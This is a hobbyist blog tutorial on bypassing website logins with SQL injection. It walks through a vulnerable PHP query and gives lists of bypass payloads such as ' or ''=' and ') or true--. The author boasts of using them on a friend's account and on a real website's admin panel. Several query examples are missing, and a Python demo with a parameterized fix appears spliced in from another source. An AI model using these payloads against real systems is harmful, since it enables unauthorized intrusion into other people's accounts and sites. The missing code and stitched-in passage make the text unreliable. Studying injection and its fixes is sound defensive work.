
Login Bypass With SQL Injection

First of all, read the previous article, SQL Injection Explained From Scratch, so you can get this stuff better.
So today we are going to learn how we can bypass logins using SQL Injection.
Now let's get straight to the point. This is a sample login form:
[Screenshot: login form]
So innocent and simple: it simply matches the user input against the records in the database and lets the user log into his account if the record exists, and if there is no match it shows an error like "The username or password is incorrect".
It seems secure, but as hackers say, "Security is an illusion", so to clear this illusion let's take a close look at the login form by checking its source code.

So this is the source code of a webpage created using a programming language named PHP. It takes the user input, puts it into the SQL query, then checks if any row exists with that value and allows you to log in.
Wait wait wait... It takes the user input and puts it into the SQL query?
What if there is no security feature checking what the user enters and we can submit anything?
Yeah, I am talking about submitting a SQL query and interacting with the database, and this is what we call SQL Injection.
So let's try to log in without a username and password. Yeah, without a username and password.
First of all, let's see which part of the code we need to deal with:

Let's try to understand what this code does by breaking it into parts:
1. $query=
It contains the query which is going to be processed.

2. username='$username' and password='$password'
It places the values entered by the user into the username and password conditions so they can be searched for in the database.

3. select username,password from users where
It selects the two columns, username and password, from a table named users, for the rows matching the information (username='$username' and password='$password') provided by the user.
Confused?
Well, it takes the username and password from the user and then looks for a row with those values in the username and password columns of a table named "users".
Still confused?
I told you man... I told you to read the previous article. Please take everything I say seriously.
Hmmm, so let's take advantage of the behavior of this code, i.e. it lets the user enter anything.
Look at those two red colored single quotes:
username='$username'
They indicate the start and end of the value. Now let's have some fun by adding a ' (single quote) to the username field, as it will disturb the syntax (rules and shit bro) of the code.
When we do this we will get an error like "You have an error in your SQL syntax blah! blah! blah!"
With that error we just confirmed that the code accepts commands from the user.
Now let's say I know that a friend of mine has an account on this website with the username Chutiya, but I don't know his password. I do know that this website is vulnerable to SQL Injection.
So I will enter Chutiya in the username field and ' or ''=' in the password field.
And boom!! I got into his account!
Don't kill me please... I will tell you everything.
Well, I entered ' or ''=', which made the query return true; ummmm, it told the code that the password entered by the user is correct. The password condition became password='' or ''='', and since '' always equals '', that part of the check passes no matter what the real password is.
So the query only matched the username Chutiya and not the password, because we made it assume that the password is correct. *Like a boss*
Now following the same method one may gain admin access to a website by bypassing the Admin Panel.
The admin panel is a page of a website where the admin of the website logs in and makes changes to the website.
In the admin panel we can try to enter admin, superuser etc. in the username field and then again ' or ''=' in the password field.
But you can log in without knowing the username! Just inject ' or ''=' in both fields, i.e. the username and password fields.
Let me show you a real scenario. I have the admin panel of a real website here:
[Screenshot: admin panel login page]
Now let's put (inject) ' or ''=' in both the username and password fields:
[Screenshot: injection entered in both fields]
*Hacker Voice* I am in:
[Screenshot: admin panel after the login bypass]
So what happened here?
Well, I confused the code into thinking that both the username and the password are correct, and it gave us access as admin.
Now let's try something else:

You see that? It is used to comment out the rest of the query in SQL, or you can say it marks the start of a comment.
Comments do not get executed, and hence the query will not check whether the password is correct or not.
So we talked about a code that had the following query:

Now let's see some variations of the query and how we can inject them.

Query:

Injections:
" or true--
" or ""="
" or 1--
" or "x"="

Query:

Injections:
') or true--
') or ('')=('
') or 1--
') or ('x')=('

Query:

Injections:
") or true--
") or ("")=("
") or 1--
") or ("x")=("

Query:

Injections:
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('

Life is too short to explain every injection above in detail, so just keep learning and you will find out how they work.
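To see the mechanism end to end, here is a runnable version of the login discussed above together with its fix. It is added example code, not the post's PHP: an SQLite-backed login that builds its query by string concatenation exactly like the code above, with the ' or ''=' and ' or 1-- injections from the lists tried against it, beside a parameterized version that treats the same input as plain data. The users table and the admin / correct-horse account are constructed sample data.

```python
import sqlite3

# Constructed sample data (not from the post): an in-memory database standing in
# for the tutorial's "users" table, with one account.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")

def build_query(username: str, password: str) -> str:
    """Same shape as the post's PHP: user input pasted straight into the SQL."""
    return ("select username,password from users where "
            f"username='{username}' and password='{password}'")

def login_vulnerable(username: str, password: str) -> bool:
    """Returns True when the concatenated query matches at least one row."""
    return conn.execute(build_query(username, password)).fetchone() is not None

def login_safe(username: str, password: str) -> bool:
    """Hardened form: '?' placeholders bind the input as data, never as SQL."""
    query = ("select username,password from users where "
             "username=? and password=?")
    return conn.execute(query, (username, password)).fetchone() is not None

def probe_with_quote(username: str) -> bool:
    """The post's first step: a lone quote breaks the syntax of the vulnerable
    query, which is what the 'error in your SQL syntax' message reveals."""
    try:
        login_vulnerable(username, "x")
        return False
    except sqlite3.OperationalError:   # SQLite's version of that syntax error
        return True

if __name__ == "__main__":
    bypass = "' or ''='"
    print(build_query("admin", bypass))           # shows the rewritten WHERE clause
    print(probe_with_quote("'"))                  # True: a single quote breaks the query
    print(login_vulnerable("admin", bypass))      # True: password check defeated
    print(login_vulnerable(bypass, bypass))       # True: no username needed either
    print(login_vulnerable("admin", "' or 1--"))  # True: the comment drops the rest
    print(login_safe("admin", bypass))            # False: payload is just a string
    print(login_safe("admin", "correct-horse"))   # True: only the real password works
```

The AND/OR precedence is what does the work: password='' or ''='' is evaluated as (username=... and password='') or (''=''), and the right side is always true.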
Till then keep reading ./logout


About the author

D3V

I am Somdev Sangwan, also known as D3V. I am a n00b and I love computers and hacking. I am a Python freak and your friendly neighborhood hacker.
